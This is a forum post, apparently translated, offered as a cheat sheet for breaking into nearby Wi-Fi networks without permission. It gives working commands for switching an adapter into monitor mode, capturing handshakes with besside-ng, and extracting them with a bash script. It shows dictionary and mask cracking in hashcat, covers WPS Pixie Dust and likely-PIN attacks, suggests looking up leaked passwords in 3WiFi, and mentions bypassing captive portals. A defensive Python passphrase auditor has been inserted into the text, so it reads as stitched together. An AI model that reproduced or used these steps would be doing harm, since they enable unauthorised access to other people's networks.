OP 05 June, 2021 - 11:01 AM
Hope you all like it. :)
Is it possible to hack Wi-Fi now?
Earlier, under the articles on the audit of the security of Wi-Fi networks, they left comments in the spirit of "what are you doing here, you won't pick up a password in a thousand years." And it seems to be a correct statement, but if I just need access to the Internet, then practice in different cities and even different countries shows the same result: you can ALWAYS get a password from Wi-Fi.
We have two factors for us:
1. We do not need to hack a specific Wi-Fi network or all networks. It is enough for us to find one weak Access Point with an acceptable signal level
2. There are several very effective methods, and if you apply all of them, you will almost certainly be able to find a Wi-Fi network that will succumb to
In general, at first I wanted to make an extract of the commands that I cannot remember, so that there was something like a cheat sheet. But then the idea came up to collect all the most effective methods, which together always bring me results.
This will be a cheat sheet for me and for beginners, since most of the methods are pretty simple and almost all are fast.
That is, on the one hand, there will be no new methods in this article that would not have been considered before, but, on the other hand, there will be something like a strategy, when combining the least time-consuming and most effective methods, you can quickly achieve success in getting Internet access in a new place.
Here is an example of collected passwords in my previous place of residence (Asian hinterland with three-story houses):
3wifi-passwords.png
3wifi-passwords-2.png
Lines that start with [+] are mined with OneShot, lines that start with {"result" : true, "data": { mined with 3WiFi. 3BB-KANCHANANAT picked up with brute force. Most of the passwords were collected in 20-30 minutes.
What you need to hack Wi-Fi
1. You need a sufficient number of wireless networks. If you live on the edge of a village and there is only one Wi-Fi network within your reach, it is obvious that your chances are not great.
The more networks in the area, the better.
2. There are no special hardware requirements, and even Wi-Fi adapters that do not support monitor mode are suitable for some attacks. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, then it is better to buy another, bigger one. IMHO, half of the "skills" of a Wi-Fi cracker lie in a large antenna...
Required commands
Further on I will only say "adapter in monitor mode" or "adapter in managed mode"; I will not duplicate these commands.
To view the names of the wireless interfaces and their current mode:
The code:
iw dev
To switch the Wi-Fi card to monitor mode:
Bash:
sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> up
If the attack does not need an Internet connection (and some do need it), then it is better to stop the processes that may interfere (when the first command is executed, the Internet connection will be lost):
Bash:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Return to managed mode:
Bash:
sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set type managed
sudo ip link set <INTERFACE> up
Or just unplug and plug in the Wi-Fi adapter again: by default it always comes up in managed mode.
If you stopped NetworkManager, then to start it run:
Bash:
sudo systemctl start NetworkManager
Finding Already Hacked Wireless Access Points
This is the simplest method, it does not require a wireless connection, but it does require an Internet connection. After the end of the scan, when the seen APs are checked against the database, the Wi-Fi adapter (which performed the scan) is no longer used. That is, while the check is taking place, you can move on to the next attack. If you have another, non-guest 3WiFi account, then in the script itself, replace the API and remove the line
The code:
sleep 15;
In this case, the script will not pause between checks.
In Windows, you can use Router Scan by Stas'M to view the BSSIDs, and then search for them in 3WiFi. For details, see the article "3WiFi Service: Passwords from Wi-Fi Access Points". If I'm not mistaken, Router Scan can automatically check the Access Points it sees against the 3WiFi database.
Pixie Dust without monitor mode
The author of the current mod told me about the OneShot program in a comment; since then it has been my favorite program, and I run it even more often than my own WiFi-autopwner script.
This program can only receive passwords from APs with WPS enabled, but it does not need monitor mode. With a Pixie Dust attack, the password can be obtained in a matter of seconds.
For Windows, the analogue is Router Scan by Stas'M, for details see the article "New features of Router Scan by Stas'M v2.60: wireless hacking of Wi-Fi from Windows".
Fast brute-force password
Unfortunately, there are not very many access points with WPS enabled. Nevertheless, we will return to them later. Now we will look at the classic variant of capturing a handshake and cracking a password. It works as follows:
- handshakes are captured automatically for all Access Points within reach;
- two types of brute-force are launched with Hashcat: using a dictionary and an eight-digit mask. Experience shows that quite a few Access Points succumb to this. This method also has a good time-to-value ratio.
We transfer the wireless interface to monitor mode.
We run the command to collect handshakes:
Bash:
sudo besside-ng INTERFACE -W
All handshakes will be saved to the wpa.cap file.
If you are going to hack them all, then you can convert everything at once to hashcat format using cap2hccapx:
Bash:
cap2hccapx wpa.cap output.hccapx
If you only need the hash of a specific Access Point, then use the network name (ESSID) as a filter. For example, I'm only interested in the netis56 Wi-Fi handshake and I want to save it to the netis56.hccapx file:
Bash:
cap2hccapx wpa.cap netis56.hccapx netis56
If you want to split the wpa.cap file into separate handshakes, then use handshakes_extractor.sh, and then also convert them with the cap2hccapx program.
handshakes_extractor.sh
Bash:
#!/bin/bash
# Author: MiAl
AIRCRACK_TIMEOUT=2 # How long aircrack-ng is given to read the file, in seconds.
# If you have a very large file or a very slow system, increase this value.
DIR=$(date +"%Y-%m-%d-%H%M%S")
ISDIRCREATED=0
if [[ "$1" && -f "$1" ]]; then
    FILE="$1"
else
    echo 'Specify the .(p)cap file from which to extract the handshakes.'
    echo 'Launch example:'
    echo -e "\tbash handshakes_extractor.sh wpa.cap"
    exit 1
fi
# aircrack-ng lists each network as "<index> <BSSID> <ESSID> WPA (<n> handshake)".
# Keep only lines with at least one handshake; fields 2 and 3 are the BSSID and ESSID.
while read -r line; do
    MATCH="$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(')"
    if [ -n "$MATCH" ]; then
        if [ "$ISDIRCREATED" -eq 0 ]; then
            # Braces (not a subshell) so that "exit 1" really terminates the script.
            mkdir "./$DIR" || { echo "Cannot create a directory to save the handshakes. Exiting."; exit 1; }
            ISDIRCREATED=1
        fi
        BSSID="$(echo "$MATCH" | awk -F ' ' '{print $2}')"
        ESSID="$(echo "$MATCH" | awk -F ' ' '{print $3}')"
        echo -e "\033[0;32mFound a handshake for network $ESSID ($BSSID). Saved to file $DIR/\033[1m$ESSID.pcap\e[0m"
        # Keep beacons (0x08), probe responses (0x05) and EAPOL frames for this BSSID:
        # the first pass prints them, the second writes them to a per-network pcap.
        FILTER="(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == $BSSID"
        tshark -r "$FILE" -R "$FILTER" -2 2>/dev/null
        tshark -r "$FILE" -R "$FILTER" -2 -w "./$DIR/$ESSID.pcap" -F pcap 2>/dev/null
    fi
done < <(timeout "$AIRCRACK_TIMEOUT" aircrack-ng "$FILE")
Launch example:
Bash:
bash handshakes_extractor.sh wpa.cap
For the dictionary attack I use the rockyou dictionary; the cleaned version can be downloaded from this link.
An example of a successful dictionary cracking (cracking time 9 seconds):
hashcat-dictionary.png
Another example of a successful dictionary cracking (cracking time 13 seconds):
hashcat-dictionary-2.png
My command to run:
Bash:
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 0 'HASH.hccapx' /PATH/TO/rockyou_cleaned.txt
In this command, the required options are:
'HASH.hccapx' - your hccapx file with one or more hashes
/PATH/TO/rockyou_cleaned.txt - path to the dictionary
-m 2500 - specifies the type of hash to be cracked
Optional options:
-a 0 - attack type: dictionary attack. May be skipped, since it is assumed by default
-D 1,2 - means use both the CPU and the video card to crack the password. If not specified, most likely only the video card will be selected
--force means to ignore warnings. Without this option, my central processor is not used to crack passwords. Be careful with this option
--hwmon-temp-abort=100 is the maximum temperature at which brute-force will be forcibly aborted. I have such a climate that during the day the room is always above +30 ℃; besides, I run brute force on a laptop (I do not recommend doing this on a laptop!!!), so in my conditions the default barrier of +90 ℃ is reached very quickly and the brute force stops. With this option set to a temperature higher than the default 90, you can actually burn your computer / video card / laptop. Use exclusively at your own peril and risk - I WARNED YOU!!! Although in practice my temperature reaches 94-96 and then the video card drops its frequencies - apparently, it also has its own limit.
To launch a mask attack:
Bash:
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 3 'HASH.hccapx' ?d?d?d?d?d?d?d?d
New in this command:
?d?d?d?d?d?d?d?d - the mask, meaning eight digits; on my hardware it takes about 20 minutes. To create a mask with more digits, add ?d.
-a 3 - means mask attack.
In addition to 8-digit passwords, 9-11-digit passwords are also common (the latter are most often phone numbers, so you can specify the mask as 89?d?d?d?d?d?d?d?d?d), but each additional digit increases the search time by 10 times.
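As an added defender-side example (not from the post or from any of the tools it names), the following Python audits a candidate WPA passphrase against exactly the cheap attack classes described above: a dictionary hit, an 8-11 digit mask, and the phone-number mask. The wordlist is a small constructed stand-in for the cleaned rockyou file, and the throughput figure is an assumption scaled from the post's own numbers (10^8 candidates in about 20 minutes).

```python
import re

# Hashcat built-in charset sizes, used to compute the keyspace of a mask.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

# Assumed throughput, scaled from the post: an 8-digit mask (10**8 candidates)
# takes about 20 minutes on the author's hardware. Real rates depend on the GPU.
CANDIDATES_PER_SECOND = 10**8 / (20 * 60)

# Constructed stand-in for a cleaned rockyou-style wordlist (a few entries only).
SAMPLE_WORDLIST = {"password", "iloveyou", "qwerty123", "sunshine"}


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat mask such as '?d?d?d?d' generates.
    Literal characters (e.g. the '89' prefix of the phone-number mask) and the
    escaped '??' each contribute a factor of 1."""
    size = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' in mask")
            c = mask[i + 1]
            if c != "?":
                if c not in CHARSET_SIZES:
                    raise ValueError(f"unknown charset ?{c}")
                size *= CHARSET_SIZES[c]
            i += 2
        else:
            i += 1
    return size


def seconds_to_exhaust(mask: str, rate: float = CANDIDATES_PER_SECOND) -> float:
    """Worst-case time to run the whole mask at the assumed rate."""
    return mask_keyspace(mask) / rate


def weak_passphrase_reasons(passphrase: str, wordlist=SAMPLE_WORDLIST) -> list:
    """List the cheap attack classes from the post that would recover this
    passphrase; an empty list means none of them applies."""
    reasons = []
    if passphrase.lower() in wordlist:
        reasons.append("dictionary")
    if re.fullmatch(r"\d{8,11}", passphrase):
        mask = "?d" * len(passphrase)
        minutes = seconds_to_exhaust(mask) / 60
        reasons.append(f"digit-mask {mask} (~{minutes:.0f} min)")
    if re.fullmatch(r"89\d{9}", passphrase):
        reasons.append("phone-number mask 89?d?d?d?d?d?d?d?d?d")
    return reasons


if __name__ == "__main__":
    for candidate in ["12345678", "89123456789", "Password", "correct horse battery"]:
        print(candidate, "->", weak_passphrase_reasons(candidate) or "not in the cheap classes")
```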
Hacking WPS by the most probable pins
In addition to the already considered Pixie Dust attack, there is another very interesting attack on Access Points with WPS enabled. The fact is that for some models of routers, pins are generated according to certain algorithms, for example, based on the MAC address of the router or its serial number. Knowing this data, you can generate one or more pins that are highly likely to be suitable for a wireless access point.
Such an attack is implemented in WiFi-autopwner - this script requires an Internet connection to request PINs online, but a fix is implemented for adapters on the Ralink chipset (most of them).
An example of very quickly hacked Wi-Fi networks using this method:
wps-10.png
wps-11.png
Another similar attack is implemented in airgeddon. But in this program, WPS attacks do not work with adapters based on Ralink chipsets. In this program you need to use, for example, the Alfa AWUS036NHA (Atheros chipset), best with the Alfa ARS-N19 antenna. I also use such a bundle.
Open networks. Bypassing intercepting portals
I haven't seen normal open networks for a very long time. But there are enough intercepting portals.
Many of these can be bypassed with the hack-captive-portals program.
Wireless Adapters for Hacking Wi-Fi
A good option for beginners is the Alfa AWUS036NHA with the Alfa ARS-N19 antenna. This is generally a very good Wi-Fi adapter for hacking wireless networks, including attacks on WPS. The disadvantage of this card is that it is rather old and does not support modern protocols.
To support modern protocols, you can choose an Alfa with external antennas from this list.